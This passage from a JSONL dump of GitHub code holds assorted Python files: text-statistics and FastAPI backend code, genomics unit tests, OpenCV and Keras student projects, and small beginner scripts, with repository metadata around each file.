2\n","repo_name":"titipata/language-variability-neuro","sub_path":"code/entropy.py","file_name":"entropy.py","file_ext":"py","file_size_in_byte":2588,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"14724658447","text":"#! /usr/bin/python3\n\nimport collections\nimport multiprocessing\nimport pagedb\nimport sys\nimport word_seg\nimport math\nimport time\n\n# Each multiprocess worker needs its own connection to the database.\n# The simplest way to accomplish this is with a global variable, which\n# is set up in the pool initializer callback, and used by the map\n# workers. (Each process has its own copy of the global.)\n\nDATABASE = None\ndef worker_init(dbname, runs):\n global DATABASE\n DATABASE = pagedb.PageDB(dbname, runs)\n\n# worker functions\ndef corpus_wide_statistics(lang, db):\n \"\"\"Compute corpus-wide frequency and raw document frequency per term,\n and count the number of documents.\"\"\"\n\n corpus_word_freq = collections.Counter()\n raw_doc_freq = collections.Counter()\n n_documents = 0\n\n for text in db.get_page_texts(where_clause=\"lang_code='{}'\"\n .format(lang)):\n\n n_documents += 1\n already_this_document = set()\n for word in word_seg.segment(lang, text.contents):\n corpus_word_freq[word] += 1\n if word not in already_this_document:\n raw_doc_freq[word] += 1\n already_this_document.add(word)\n\n idf = compute_idf(n_documents, raw_doc_freq)\n db.update_corpus_statistics(lang, n_documents,\n [('cwf', corpus_word_freq),\n ('rdf', raw_doc_freq),\n ('idf', idf)])\n\n return idf\n\ndef compute_idf(n_documents, raw_doc_freq):\n \"\"\"Compute inverse document frequencies:\n idf(t, D) = log |D|/|{d in D: t in d}|\n i.e. total number of documents over number of documents containing\n the term. Since this is within-corpus IDF we know by construction\n that the denominator will never be zero.\"\"\"\n\n log = math.log\n return { word: log(n_documents/doc_freq)\n for word, doc_freq in raw_doc_freq.items() }\n\ndef compute_tfidf(db, lang, text, idf):\n # This is baseline tf-idf: no corrections for document length or\n # anything like that.\n tf = collections.Counter()\n for word in word_seg.segment(lang, text.contents):\n tf[word] += 1\n\n for word in tf.keys():\n tf[word] *= idf[word]\n\n db.update_text_statistic('tfidf', text.origin, tf)\n\ndef compute_nfidf(db, lang, text, idf):\n # This is \"augmented normalized\" tf-idf: the term frequency within\n # each document is normalized by the maximum term frequency within\n # that document, so long documents cannot over-influence scoring\n # of the entire corpus.\n tf = collections.Counter()\n for word in word_seg.segment(lang, text.contents):\n tf[word] += 1\n\n try:\n max_tf = max(tf.values())\n except ValueError:\n max_tf = 1\n\n for word in tf.keys():\n tf[word] = (0.5 + (0.5 * tf[word])/max_tf) * idf[word]\n\n db.update_text_statistic('nfidf', text.origin, tf)\n\ndef process_language(lang):\n db = DATABASE\n\n idf = corpus_wide_statistics(lang, db)\n ndoc, idf = db.get_corpus_statistic('idf', lang)\n\n # Note: the entire get_page_texts() operation must be enclosed in a\n # single transaction; committing in the middle will invalidate the\n # server-side cursor it holds.\n with db:\n for text in db.get_page_texts(\n where_clause=\"lang_code='{}'\"\n .format(lang)):\n compute_tfidf(db, lang, text, idf)\n compute_nfidf(db, lang, text, idf)\n\n return lang\n\ndef prep_database(dbname, runs):\n db = pagedb.PageDB(dbname, runs)\n langs = db.prepare_text_statistic('tfidf')\n langs |= db.prepare_text_statistic('nfidf')\n return langs\n\ndef fmt_interval(interval):\n m, s = divmod(interval, 60)\n h, m = divmod(m, 60)\n return \"{}:{:>02}:{:>05.2f}\".format(int(h), int(m), s)\n\ndef main():\n dbname = sys.argv[1]\n runs = sys.argv[2:]\n lang_codes = prep_database(dbname, runs)\n\n pool = multiprocessing.Pool(initializer=worker_init,\n initargs=(dbname, runs))\n\n start = time.time()\n sys.stderr.write(\"{}: processing {} languages...\\n\"\n .format(fmt_interval(0), len(lang_codes)))\n for finished in pool.imap_unordered(process_language, lang_codes):\n sys.stderr.write(\"{}: {}\\n\".format(fmt_interval(time.time() - start),\n finished))\n\nmain()\n","repo_name":"zackw/tbbscraper","sub_path":"analysis/tfidf.py","file_name":"tfidf.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"75"} +{"seq_id":"21153989712","text":"#\n\n#!FastApi\nfrom fastapi import FastAPI, Depends, Request\nfrom fastapi.exceptions import RequestValidationError, HTTPException\n\n#!Tortoise Orm\nfrom tortoise.contrib.fastapi import HTTPNotFoundError\nfrom tortoise.exceptions import DoesNotExist\n\n#!Database models\nfrom models.course import Category\nfrom schemas.category import CategoryOutSchema, CategoryUpdateSchema\nfrom schemas.base import Status\n\n#!Pydantic\nfrom pydantic import BaseModel\n\n#!Python modules and functions\nfrom typing import List\nfrom decouple import config\n\n#!Helpers methods\nfrom utils.helpers import generate_slug\n\n\n# *CategoryManager\nclass CategoryManager:\n # ? get_all_categories\n @staticmethod\n async def get_all_categories() -> CategoryOutSchema:\n return await CategoryOutSchema.from_queryset(Category.all())\n\n # ? get_category\n @staticmethod\n async def get_category(slug) -> CategoryOutSchema:\n return await CategoryOutSchema.from_queryset_single(Category.get(slug=slug))\n\n # ?create_category\n @staticmethod\n async def create_category(category) -> CategoryOutSchema:\n category_dict = category.dict(exclude_unset=True)\n category_obj = await Category.create(**category_dict)\n return await CategoryOutSchema.from_tortoise_orm(category_obj)\n\n # ?update_category\n @staticmethod\n async def update_category(slug, category) -> CategoryOutSchema:\n try:\n db_category = await CategoryOutSchema.from_queryset_single(\n Category.get(slug=slug)\n )\n except DoesNotExist:\n raise HTTPException(status_code=404, detail=f\"Category {slug} not found\")\n if db_category.id or db_category.slug:\n await Category.filter(slug=slug).update(\n **category.dict(exclude_unset=True), slug=generate_slug(category.name)\n )\n return await CategoryOutSchema.from_queryset_single(\n Category.get(slug=generate_slug(category.name))\n )\n return HTTPException(status_code=404, detail=f\"Category not found\")\n\n # ?delete_category\n @staticmethod\n async def delete_category(slug) -> Status:\n try:\n db_category = await CategoryOutSchema.from_queryset_single(\n Category.get(slug=slug)\n )\n except DoesNotExist:\n raise HTTPException(status_code=404, detail=f\"Category {slug} not found\")\n\n if db_category.id or db_category.slug:\n deleted_category = await Category.filter(slug=slug).delete()\n if not deleted_category:\n raise HTTPException(\n status_code=404, detail=f\"Unable to delete category\"\n )\n return Status(message=f\"Deleted course {slug}\")\n return HTTPException(status_code=404, detail=f\"Category not found\")\n\n # ?delete_all_categories\n @staticmethod\n async def delete_all_categories() -> Status:\n all_deleted_categories = await Category.all().delete()\n if not all_deleted_categories:\n raise HTTPException(\n status_code=404, detail=f\"Your database model not exists category data\"\n )\n return Status(message=f\"All categories deleted successfully\")\n","repo_name":"riadelimemmedov/CourseMarketPlaceWeb3-Next.Js-FastAPI","sub_path":"backend/managers/course/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":3228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34412459021","text":"class Solution:\n def computeArea(self, ax1: int, ay1: int, ax2: int, ay2: int, bx1: int, by1: int, bx2: int, by2: int) -> int:\n area_1 = (ax2 - ax1) * (ay2 - ay1)\n area_2 = (bx2 - bx1) * (by2 - by1)\n\n overlap_width = min(ax2, bx2) - max(bx1, ax1)\n overlap_height = min(ay2, by2) - max(ay1, by1)\n if overlap_width > 0 and overlap_height > 0:\n return area_1 + area_2 - (overlap_width * overlap_height)\n else:\n return area_1 + area_2","repo_name":"s0lut1on/leetcode","sub_path":"rectangle_area.py","file_name":"rectangle_area.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73419031283","text":"#!/usr/bin/env python\n\nimport unittest\nfrom mock import Mock, PropertyMock\nfrom src.cds import CDS\n\nclass TestCDS(unittest.TestCase):\n\n def setUp(self):\n self.test_indices1 = [3734, 4034]\n self.extra_indices = [[4092, 4332], [4399, 5185], [5249, 6565], [6630, 7436]]\n test_identifier1 = 8\n self.extra_identifiers = [9, 10, 11, 12]\n self.test_phase1 = 0\n self.extra_phases = [2, 1, 0, 0]\n test_parent_id1 = 2\n self.test_cds0 = CDS(identifier=test_identifier1, indices=self.test_indices1, score=None, phase=self.test_phase1, strand='-', parent_id=test_parent_id1)\n self.test_cds1 = CDS(identifier=test_identifier1, indices=self.test_indices1, score=None, phase=self.test_phase1, strand='+', parent_id=test_parent_id1)\n for ind_pair in self.extra_indices:\n self.test_cds1.add_indices(ind_pair)\n for ident in self.extra_identifiers:\n self.test_cds1.add_identifier(ident)\n for phase in self.extra_phases:\n self.test_cds1.add_phase(phase)\n\n def test_constructor(self):\n self.assertEquals('-', self.test_cds0.strand)\n\n def test_get_start_indices_pos_strand(self):\n expected = [3734, 3736]\n self.assertEquals(expected, self.test_cds1.get_start_indices('+'))\n\n def test_get_start_indices_neg_strand(self):\n expected = [4032, 4034]\n self.assertEquals(expected, self.test_cds1.get_start_indices('-'))\n\n def test_get_stop_indices_pos_strand(self):\n expected = [7434, 7436]\n self.assertEquals(expected, self.test_cds1.get_stop_indices('+'))\n\n def test_get_stop_indices_neg_strand(self):\n expected = [6630, 6632]\n self.assertEquals(expected, self.test_cds1.get_stop_indices('-'))\n\n def test_extract_sequence_pos_strand(self):\n seq_object = Mock()\n seq_object.get_subseq.return_value = 'GATTACA'\n strand = '+'\n seq = self.test_cds1.extract_sequence(seq_object, strand)\n expected = 'GATTACAGATTACAGATTACAGATTACAGATTACA'\n self.assertEquals(expected, seq)\n\n def test_extract_sequence_neg_strand(self):\n seq_object = Mock()\n seq_object.get_subseq.return_value = 'GATTACA'\n strand = '-'\n result = self.test_cds1.extract_sequence(seq_object, strand)\n expected = 'TGTAATCTGTAATCTGTAATCTGTAATCTGTAATC'\n self.assertEquals(expected, result)\n\n def test_cds_constructor(self):\n self.assertEquals('CDS', self.test_cds0.__class__.__name__)\n # should also be able to construct w/o all the params...\n empty_cds = CDS()\n self.assertEquals('CDS', empty_cds.feature_type) \n\n def test_add_indices(self):\n for ind_pair in self.extra_indices:\n self.test_cds0.add_indices(ind_pair)\n self.assertEquals([4399, 5185], self.test_cds0.indices[2])\n\n def test_add_identifier(self):\n for ident in self.extra_identifiers:\n self.test_cds0.add_identifier(ident)\n self.assertEquals(5, len(self.test_cds0.identifier))\n\n def test_add_phase(self):\n for phase in self.extra_phases:\n self.test_cds0.add_phase(phase)\n self.assertEquals(5, len(self.test_cds0.phase))\n self.assertEquals(1, self.test_cds0.phase[2])\n\n def test_sort_attributes(self):\n cds = CDS()\n cds.indices = [[25, 30], [5, 10]] # out of order!\n cds.identifier = [\"cds2\", \"cds1\"]\n cds.phase = [1, 0]\n self.assertEquals(\"cds1\", cds.identifier[1])\n self.assertEquals([25, 30], cds.indices[0])\n self.assertEquals(1, cds.phase[0])\n cds.sort_attributes()\n self.assertEquals(\"cds1\", cds.identifier[0])\n self.assertEquals([5, 10], cds.indices[0])\n self.assertEquals(0, cds.phase[0])\n\n def test_length(self):\n self.assertEquals(3453, self.test_cds1.length())\n\n def test_adjust_indices(self):\n self.test_cds1.adjust_indices(-5)\n self.assertEquals(3729, self.test_cds1.indices[0][0])\n # (adjust them back so future test don't get confused :)\n self.test_cds1.adjust_indices(5)\n self.assertEquals(5185, self.test_cds1.indices[2][1])\n\n def test_to_gff(self):\n expected1 = \"sctg_0080_0020\\tmaker\\tCDS\\t3734\\t4034\\t.\\t+\\t0\\tID=8;Parent=2;foo=dog\\n\"\n expected2 = \"sctg_0080_0020\\tmaker\\tCDS\\t4092\\t4332\\t.\\t+\\t2\\tID=9;Parent=2;foo=dog\\n\"\n expected3 = \"sctg_0080_0020\\tmaker\\tCDS\\t4399\\t5185\\t.\\t+\\t1\\tID=10;Parent=2;foo=dog\\n\"\n expected4 = \"sctg_0080_0020\\tmaker\\tCDS\\t5249\\t6565\\t.\\t+\\t0\\tID=11;Parent=2;foo=dog\\n\"\n expected5 = \"sctg_0080_0020\\tmaker\\tCDS\\t6630\\t7436\\t.\\t+\\t0\\tID=12;Parent=2;foo=dog\\n\"\n expected = expected1 + expected2 + expected3 + expected4 + expected5\n self.test_cds1.add_annotation('foo','dog') # Make sure our annotations are working\n actual = self.test_cds1.to_gff(seq_name=\"sctg_0080_0020\", source=\"maker\")\n self.assertEquals(expected, actual)\n # what if identifier, parent_id are strings? does it matter?\n test_cds2 = CDS(identifier='foo1', indices=self.test_indices1, score=None, strand='+', phase=self.test_phase1, parent_id='bar7')\n extra_identifiers2 = ['foo2', 'foo3', 'foo4', 'foo5']\n for ind_pair in self.extra_indices:\n test_cds2.add_indices(ind_pair)\n for ident in extra_identifiers2:\n test_cds2.add_identifier(ident)\n for phase in self.extra_phases:\n test_cds2.add_phase(phase)\n expected1 = \"sctg_0080_0020\\tmaker\\tCDS\\t3734\\t4034\\t.\\t+\\t0\\tID=foo1;Parent=bar7\\n\"\n expected2 = \"sctg_0080_0020\\tmaker\\tCDS\\t4092\\t4332\\t.\\t+\\t2\\tID=foo2;Parent=bar7\\n\"\n expected3 = \"sctg_0080_0020\\tmaker\\tCDS\\t4399\\t5185\\t.\\t+\\t1\\tID=foo3;Parent=bar7\\n\"\n expected4 = \"sctg_0080_0020\\tmaker\\tCDS\\t5249\\t6565\\t.\\t+\\t0\\tID=foo4;Parent=bar7\\n\"\n expected5 = \"sctg_0080_0020\\tmaker\\tCDS\\t6630\\t7436\\t.\\t+\\t0\\tID=foo5;Parent=bar7\\n\"\n expected = expected1 + expected2 + expected3 + expected4 + expected5\n actual = test_cds2.to_gff(seq_name=\"sctg_0080_0020\", source=\"maker\")\n self.assertEquals(expected, actual)\n expected1 = \"sctg_0080_0020\\tmaker\\tCDS\\t3734\\t4034\\t.\\t+\\t0\\tID=foo1;Parent=bar7\\n\"\n expected2 = \"sctg_0080_0020\\tmaker\\tCDS\\t4092\\t4332\\t.\\t+\\t2\\tID=foo2;Parent=bar7\\n\"\n expected3 = \"sctg_0080_0020\\tmaker\\tCDS\\t4399\\t5185\\t.\\t+\\t1\\tID=foo3;Parent=bar7\\n\"\n expected4 = \"sctg_0080_0020\\tmaker\\tCDS\\t5249\\t6565\\t.\\t+\\t0\\tID=foo4;Parent=bar7\\n\"\n expected5 = \"sctg_0080_0020\\tmaker\\tCDS\\t6630\\t7436\\t.\\t+\\t0\\tID=foo5;Parent=bar7\\n\"\n expected = expected1 + expected2 + expected3 + expected4 + expected5\n actual = test_cds2.to_gff(seq_name=\"sctg_0080_0020\", source=\"maker\")\n self.assertEquals(expected, actual)\n\n def test_to_tbl_positive_complete(self):\n expected = \"3734\\t4034\\tCDS\\n\"\n expected += \"4092\\t4332\\n\"\n expected += \"4399\\t5185\\n\"\n expected += \"5249\\t6565\\n\"\n expected += \"6630\\t7436\\n\"\n expected += \"\\t\\t\\tcodon_start\\t2\\n\"\n self.test_cds1.phase[0] = 1\n self.assertEquals(self.test_cds1.to_tbl(True, True), expected)\n\n def test_to_tbl_negative_complete(self):\n expected = \"7436\\t6630\\tCDS\\n\"\n expected += \"6565\\t5249\\n\"\n expected += \"5185\\t4399\\n\"\n expected += \"4332\\t4092\\n\"\n expected += \"4034\\t3734\\n\"\n expected += \"\\t\\t\\tcodon_start\\t1\\n\"\n self.test_cds1.strand = '-'\n self.assertEquals(self.test_cds1.to_tbl(True, True), expected)\n\n def test_to_tbl_negative_no_start_no_stop(self):\n expected = \"<7436\\t6630\\tCDS\\n\"\n expected += \"6565\\t5249\\n\"\n expected += \"5185\\t4399\\n\"\n expected += \"4332\\t4092\\n\"\n expected += \"4034\\t>3734\\n\"\n expected += \"\\t\\t\\tcodon_start\\t2\\n\"\n # shouldn't look at phase[0] for negative strand!\n self.test_cds1.phase[0] = 2 # should ignore this.\n self.test_cds1.phase[4] = 1\n self.test_cds1.strand = '-'\n self.assertEquals(self.test_cds1.to_tbl(False, False), expected)\n\n\n##########################\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TestCDS))\n return suite\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"desiro/gffDB","sub_path":"GAG/test/cds_tests.py","file_name":"cds_tests.py","file_ext":"py","file_size_in_byte":8297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11893737416","text":"###############################################################################\n## Author: Team Supply Bot\n## Edition: eYRC 2019-20\n## Instructions: Do Not modify the basic skeletal structure of given APIs!!!\n###############################################################################\n\n\n######################\n## Essential libraries\n######################\nimport cv2\nimport numpy as np\nimport os\nimport math\nimport csv\n\n########################################################################\n## using os to generalise Input-Output\n########################################################################\ncodes_folder_path = os.path.abspath('.')\nimages_folder_path = os.path.abspath(os.path.join('..', 'Images'))\ngenerated_folder_path = os.path.abspath(os.path.join('..', 'Generated'))\n\n\n############################################\n## Build your algorithm in this function\n## ip_image: is the array of the input image\n## imshow helps you view that you have loaded\n## the corresponding image\n############################################\n\ndef findDist(c1, c2):\n return math.sqrt((c2[0] - c1[0]) ** 2 + (c2[1] - c1[1]) ** 2)\n\n\ndef process(ip_image):\n angle = 0.00\n ip_image[:, :, 0] = 255\n ip_image[:, :, 1] = 255\n\n # Convert to Grayscale\n grIm = cv2.cvtColor(ip_image, cv2.COLOR_BGR2GRAY)\n\n # Find binary image of green and red dot\n # Green at 185, Red at 230\n ret, binImgR = cv2.threshold(grIm, 230, 255, cv2.THRESH_BINARY)\n ret, binImgG = cv2.threshold(grIm, 185, 255, cv2.THRESH_BINARY)\n\n # Apply Gaussian Blur\n gusBlurR = cv2.GaussianBlur(binImgR, (5, 5), 0)\n gusBlurG = cv2.GaussianBlur(binImgG, (5, 5), 0)\n\n # Find Contours of Red and Green\n (contR, hieR) = cv2.findContours(gusBlurR, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # Red contour contains Centre circle and the Red Dot\n contRed, contCentre = contR[2], contR[3] # Smallest(Red Dot), and Bigger than the Smallest(Centre Circle)\n if len(contRed) > len(contCentre):\n contCentre, contRed = contRed, contCentre\n\n (contG, hieG) = cv2.findContours(gusBlurG, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # print(\"Sizes : R- \", len(contR), \" G- \", len(contG))\n\n # Just to draw the contours.\n cv2.drawContours(ip_image, contR, -1, (0, 0, 0), 2)\n cv2.drawContours(ip_image, contG, -1, (0, 0, 0), 2)\n\n # Find the Top-Left coordinates of each of circle's bounding rectangle.\n (xC, yC, widCentre, heiCentre) = cv2.boundingRect(contCentre) # Red's third Contour is the circle in centre..\n\n (xR, yR, widR, heiR) = cv2.boundingRect(contRed) # ..it's last(fourth) contour is the Red dot.\n (xG, yG, widG, heiG) = cv2.boundingRect(contG[1]) # Green's second contour is Green dot.\n\n # Draw lines from Centre to Red Dot, Green Dot.\n cv2.line(ip_image, (xC + widCentre // 2, yC + heiCentre // 2), (xR + widR // 2, yR + heiR // 2), (0, 0, 0), 2)\n cv2.line(ip_image, (xC + widCentre // 2, yC + heiCentre // 2), (xG + widG // 2, yG + heiG // 2), (0, 0, 0), 2)\n\n # Find the distance between each point, find the angle at Centre Circle's mid points, and convert the obtained\n # angle to degree.\n # Law of Cosines is used.\n coords = [(xC + widCentre / 2, yC + heiCentre / 2), (xR + widR / 2, yR + heiR / 2), (xG + widG / 2, yG + heiG / 2)]\n disCR = findDist(coords[0], coords[1])\n disCG = findDist(coords[0], coords[2])\n disRG = findDist(coords[1], coords[2])\n angle = np.rad2deg(np.arccos([((disCG ** 2) + (disCR ** 2) - (disRG ** 2)) / (2 * disCG * disCR)])[0])\n\n # Show the final image, with lines, and Contours\n cv2.imshow(\"window\", ip_image)\n cv2.waitKey(0)\n\n # Return angle upto 2 decimal place\n return round(angle, 2)\n\n\n####################################################################\n## The main program which provides read in input of one image at a\n## time to process function in which you will code your generalized\n## output computing code\n## Do not modify this code!!!\n####################################################################\ndef main():\n ################################################################\n ## variable declarations\n ################################################################\n i = 1\n line = []\n ## Reading 1 image at a time from the Images folder\n for image_name in os.listdir(images_folder_path):\n ## verifying name of image\n print(image_name)\n ## reading in image\n ip_image = cv2.imread(images_folder_path + \"/\" + image_name)\n ## verifying image has content\n print(ip_image.shape)\n ## passing read in image to process function\n A = process(ip_image)\n ## saving the output in a list variable\n line.append([str(i), image_name, str(A)])\n ## incrementing counter variable\n i += 1\n ## verifying all data\n print(line)\n ## writing to angles.csv in Generated folder without spaces\n with open(generated_folder_path + \"/\" + 'angles.csv', 'w', newline='') as writeFile:\n writer = csv.writer(writeFile)\n writer.writerows(line)\n ## closing csv file\n writeFile.close()\n\n\n############################################################################################\n## main function\n############################################################################################\nif __name__ == '__main__':\n main()\n","repo_name":"gaurav-12/open_cv_eyantra","sub_path":"Eyantra Task 1/Task1.1/Codes/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9896955791","text":"from vars import xlsx_columns\nfrom functions.exitScript import exitScript\n\ndef getAssets(journal):\n print(\"Extracting list of assets...\")\n assets_list = []\n try:\n for wallet in journal:\n for i in {xlsx_columns[\"token1\"], xlsx_columns[\"token2\"], xlsx_columns[\"tokenfee\"]}:\n assets_list += journal[wallet][i].unique().tolist()\n except Exception as e:\n print(e)\n print(f\"ERROR: Couldn't extract list of tokens\")\n exitScript(2)\n \n # I need only the unique values, use the filter to remove nan\n assets_list_unique = set(filter(lambda x: x == x , assets_list))\n\n print(f\"Assets detected: {assets_list_unique}\")\n\n return assets_list_unique","repo_name":"fabimass/crypto-journal","sub_path":"functions/getAssets.py","file_name":"getAssets.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6181511655","text":"#Jordan Russell\r\n#21/09/14\r\n#R+R Assignment IF statements.\r\n\r\nimport time\r\n\r\nage = int(input(\"Please input your age: \"))\r\n\r\nyears_until_retirement = (65 - age)\r\n\r\nif (age < 18):\r\n print(\"You are not old enough to vote.\")\r\n \r\nelse:\r\n if (age >= 18 - 65):\r\n print(\"You are old enough to vote, and you can retire in {0} years.\".format(years_until_retirement))\r\n\r\n else:\r\n if (age >= 65):\r\n print(\"You are old enough to vote and you can retire now.\")\r\n\r\n\r\n","repo_name":"JordanRussell3030/Variables","sub_path":"IF statements R+R.py","file_name":"IF statements R+R.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14487265945","text":"n = input(\"Enter count for numbers: \")\nn = int(n)\n\nsum = 0\ncount = 1\nnumbers = []\n\nwhile count <= n:\n number = input(\"Enter number: \")\n number = int(number)\n numbers += [number]\n count += 1\n\nfor i in numbers:\n sum += i\n\nprint(\"Sum is %s\" % sum)\n","repo_name":"sivilov-d/HackBulgaria","sub_path":"week2/2-List-Problems/sum_numbers.py","file_name":"sum_numbers.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72841478001","text":"# import necessary libraries\nfrom avalanche.benchmarks import datasets\n# from avalanche.benchmarks.generators import nc_scenario_from_tensor_lists\nfrom avalanche.benchmarks.generators import nc_benchmark\n# from avalanche.training.strategies import GEM\nfrom avalanche.training import GEM\nfrom avalanche.models import SimpleMLP\nfrom avalanche.logging import TextLogger\nfrom avalanche.evaluation.metrics import Accuracy\n\n# generate the dataset\ndata = [[1, 2, 0], [2, 3, 1], [3, 4, 0], [4, 5, 1], [5, 6, 0]]\n\n# create the scenario\nscenario = nc_benchmark(\n train_data=data[:3],\n test_data=data[3:],\n task_labels=[0, 0, 0, 1, 1],\n)\n\n# initialize the model\nmodel = SimpleMLP(input_size=3, num_classes=2)\n\n# create the strategy\nstrategy = GEM(model, memory_size=1000, train_epochs=1, batch_size=256, \n optimizer='adam', lr=0.001, \n lam=0.5, alpha=0.5, use_replay=True)\n\n# create the logger\nlogger = TextLogger(open('log.txt', 'w'))\n\n# create the metric\nmetric = Accuracy()\n\n# train and evaluate the model on the dataset\nfor i, train_task in enumerate(scenario.train_stream):\n # train the model on the current task\n strategy.train(train_task, logger=logger)\n\n # evaluate the model on all tasks so far\n for j, test_task in enumerate(scenario.test_stream[:i+1]):\n results = strategy.eval(test_task, metrics=metric)\n print(f\"Accuracy on test task {j+1}: {results[metric]:.4f}\")\n","repo_name":"xoyeon/FDS","sub_path":"unsupervised_CL.py","file_name":"unsupervised_CL.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40834785754","text":"import itertools\nimport os\n\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport DBhandler\nimport random\n\n\n\n\nfrom sklearn.preprocessing import MultiLabelBinarizer, LabelEncoder\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.metrics import confusion_matrix\n\nfrom tensorflow import keras\n#from keras.models import Sequential\n#from keras.layers import Dense, Activation, Dropout\n#from keras.preprocessing import text, sequence\n#from keras import utils\n\n# This code was tested with TensorFlow v1.4\n#print(\"You have TensorFlow version\", tf.__version__)\nclass MultipleOutputModel:\n def trainModel(self):\n db = DBhandler.DBHandler()\n training, test = db.loadAdvertDataMulti()\n train_data, train_label, test_data, test_label = [], [], [], []\n y_train, y_test =[], []\n num_classes_array = []\n\n for x in training:\n #convert = x.numberFormat_body.split(' ')\n #train_data.append(convert)\n train_data.append(x.searchable_body)\n\n train_label.append(x.kompetence)\n for x in test:\n #convert = x.numberFormat_body.split(' ')\n #test_data.append(convert)\n #searchable_body\n test_data.append(x.searchable_body)\n test_label.append(x.kompetence)\n\n max_words = 10000\n tokenize = keras.preprocessing.text.Tokenizer(num_words=max_words, char_level=False)\n\n tokenize.fit_on_texts(train_data) # only fit on train\n #print(tokenize.word_index)\n x_train = tokenize.texts_to_matrix(train_data)\n x_test = tokenize.texts_to_matrix(test_data)\n #print(train_label)\n\n # Use sklearn utility to convert label strings to numbered index\n #encoder = LabelEncoder()\n #for x in train_label:\n # encoder.fit(x)\n # y_train.append(encoder.transform(x))\n #for x in test_label:\n # y_test.append(encoder.transform(x))\n # #y_train = encoder.transform(train_label)\n # #y_test = encoder.transform(test_label)\n\n\n #encoder.fit(train_label)\n\n\n df = pd.DataFrame(train_label)\n #df.drop(index='NONE')\n encoder = LabelEncoder()\n encoder.fit(df)\n y_train = encoder.transform(df)\n y_test = encoder.transform(test_label)\n print(\"Shape of y: \" + str(list(df.iloc[0])))\n #print(\"Shape of y_train: \" + str(set(y_train.iloc[500])))\n\n\n #v = DictVectorizer(sparse=False)\n #v.fit(train_label)\n #y_train = v.transform(train_label)\n #y_test = v.transform(test_label)\n\n #print('Number of classes: ', y_train)\n\n\n # Converts the labels to a one-hot representation\n #num_classes_array = set(list(itertools.chain.from_iterable(y_train)))\n\n #num_classes_array = list(itertools.chain.from_iterable(y_train))\n #print(len(num_classes_array))\n num_classes = np.max(y_train) + 1\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n\n # Inspect the dimenstions of our training and test data (this is helpful to debug)\n print('x_train shape:', x_train.shape)\n print('x_test shape:', x_test.shape)\n print('y_train shape:', y_train.shape)\n print('y_test shape:', y_test.shape)\n print(\"Train data lenght: \" + str(len(x_train)))\n test=[]\n for x in y_train:\n test.extend(x)\n print(\"Train label lenght: \" + str(len(test)))\n\n model = keras.Sequential()\n model.add(keras.layers.Dense(3, input_shape=(max_words,), activation=tf.nn.relu))\n #model.add(Activation('relu'))\n model.add(keras.layers.Dense(12, activation=tf.nn.relu))\n model.add(keras.layers.Dropout(0.5))\n model.add(keras.layers.Dense(num_classes, activation=tf.nn.softmax))\n #model.add(Activation('softmax'))\n\n #model.compile(loss='categorical_crossentropy',\n # optimizer='adam',\n # metrics=['accuracy'])\n\n model.compile(optimizer=tf.train.AdamOptimizer(), \n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n checkpoint_path = \"training_1/cp.ckpt\"\n checkpoint_dir = os.path.dirname(checkpoint_path)\n\n # Create checkpoint callback\n cp_callback = tf.keras.callbacks.ModelCheckpoint(checkpoint_path, \n save_weights_only=True,\n verbose=1)\n\n history = model.fit(x_train, y_train,\n epochs=3,\n verbose=1,\n validation_split=0.1,\n callbacks = [cp_callback])\n\n\n score = model.evaluate(x_test, y_test, verbose=1)\n print('Test score:', score[0])\n print('Test accuracy:', score[1])\n # Here's how to generate a prediction on individual examples\n text_labels = encoder.classes_ \n #x_test_random = random.shuffle(x_test)\n\n for i in range(100):\n prediction = model.predict(np.array([x_test[i]]))\n predicted_label = text_labels[np.argmax(prediction)]\n #print(test_data[i][:50] + \"...\")\n print('Actual label:' + str(test_label[i]))\n print(\"Predicted label: \" + predicted_label + \"\\n\")\n\n y_softmax = model.predict(x_test)\n\n y_test_1d = []\n y_pred_1d = []\n\n for i in range(len(y_test)):\n probs = y_test[i]\n index_arr = np.nonzero(probs)\n one_hot_index = index_arr[0].item(0)\n y_test_1d.append(one_hot_index)\n\n for i in range(0, len(y_softmax)):\n probs = y_softmax[i]\n predicted_index = np.argmax(probs)\n y_pred_1d.append(predicted_index)\n","repo_name":"Research-and-Innovation-EAAA/CompetenceMachineLearning","sub_path":"CompetenceMachineLearning/CompetenceMachineLearning/MultipleOutputModel.py","file_name":"MultipleOutputModel.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7268672463","text":"#!/usr/bin/env python3\n\nimport json\nimport sys\nimport random\n\n\n\n\ndef get_random_state():\n number = random.randint(0, 100)\n if number < 40:\n return 0\n if number < 60:\n return 1\n if number < 